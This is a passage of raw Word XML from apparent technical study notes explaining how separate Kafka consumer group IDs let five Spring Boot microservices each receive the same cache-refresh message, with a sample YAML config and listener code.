      </w:r>
    </w:p>
    <w:p w14:paraId="459AB6FD"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77A707D6">
          <v:rect id="_x0000_i3585" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AD143"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Kafka Consumer Configuration Example (Spring Boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEAF0E0"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F278CAD"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kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4CB7BD"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consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931C745"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group-id: ${spring.application.name}  # Unique per service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B67456"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bootstrap-servers: localhost:9092</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7399F20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auto-offset-reset: earliest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E65725"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5DE48989">
          <v:rect id="_x0000_i3586" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA2298"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Consumer Listener Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE20AC"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KafkaListener(topics = "cache-refresh-topic", groupId = "${spring.kafka.consumer.group-id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B383F3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public void onMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD63C4"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if ("REFRESH_CACHE".equals(message)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234920AF"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System.out.println("Cache refreshed for service: " + serviceName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4777A22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refreshCache();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539598EC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D188A40"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C7E09" w14:textId="77777777" w:rsidR="000D1250" w:rsidRPr="000D1250" w:rsidRDefault="000D1250" w:rsidP="000D1250">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFBEF5E"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private void refreshCache() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1AC9A8"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 xml:space="preserve">    // Logic to clear and reload the cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B70A1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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A3EC9" w14:textId="77777777" w:rsidR="000D1250" w:rsidRPr="000D1250" w:rsidRDefault="00000000" w:rsidP="000D1250">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="237D4315">
          <v:rect id="_x0000_i3587" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32179497" w14:textId="77777777" w:rsidR="000D1250" w:rsidRPr="000D1250" w:rsidRDefault="000D1250" w:rsidP="000D1250">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC4117"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Different Group IDs:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> To ensure that </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all 5 microservices receive the message</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, configure </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each microservice with a unique consumer group ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A0032"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Message Distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kafka will </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>send the message to each group independently</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F66D23" w14:textId="77777777" w:rsidR="000D1250" w:rsidRPr="000D1250" w:rsidRDefault="000D1250" w:rsidP="000D1250">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suitable for </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>broadcasting events</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like cache refresh) to </w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple independent services</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1250">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACD807" w14:textId="77777777" w:rsidR="00F77084" w:rsidRDefault="00000000" w:rsidP="00F77084">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F963CA">
          <v:rect id="_x0000_i3588" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6D49F1" w14:textId="6F34498A" w:rsidR="00F77084" w:rsidRPr="00D87893" w:rsidRDefault="00F77084" w:rsidP="00F77084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="885" w:name="_Toc197868099"/>
      <w:r w:rsidRPr="00F77084">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If I have a different group id then can I consume the same message from 5 different microservice</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="885"/>
    </w:p>
    <w:p w14:paraId="59C5585C" w14:textId="55335778" w:rsidR="006219D6" w:rsidRPr="006219D6" w:rsidRDefault="006219D6" w:rsidP="002D0968">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, if you have </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different consumer group IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each microservice, then </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all 5 microservices will receive the same message</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the Kafka topic independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB980B"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3EB9F1A8">
          <v:rect id="_x0000_i3589" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D649093"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How Kafka Consumer Groups Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B222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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Group ID Uniqueness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B3A32"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Each </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group ID</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents an </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>independent subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096450D5"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Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tracks offsets separately</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687DA57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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Message Consumption with Different Group IDs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37428966"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If </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each have a </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different group ID</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, they </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>act as separate subscribers</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9DD17E"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Therefore, </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all 5 microservices will receive the same message</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577A9488"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The message will be </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>processed by each microservice independently</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1035F"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7E789E95">
          <v:rect id="_x0000_i3590" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AFE73"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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D03853"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>notification microservice</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> publishes a message to the Kafka topic cache-refresh-topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DAAF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e </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 consumer microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listen to the same topic but have </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different group IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A655D11"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A:</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> group-id: ms-a-group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB00EA5"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B:</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> group-id: ms-b-group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262EB5FF"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C:</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> group-id: ms-c-group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6908BA3F"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t>Microservice D:</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> group-id: ms-d-group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDEF16" w14:textId="77777777" w:rsidR="006219D6" w:rsidRPr="006219D6" w:rsidRDefault="006219D6" w:rsidP="006219D6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Microservice E:</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> group-id: ms-e-group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329DD8E"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Expected Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28258421"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will </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deliver the same message</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to each of these 5 microservices because they belong to </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424A9D1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All microservices </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>receive and process the message independently</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437835B2"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7468B130">
          <v:rect id="_x0000_i3591" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0C10E"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Why Different Group IDs Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB3CA9"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considers </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each group ID as a separate client</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382DB91"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Even if the </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
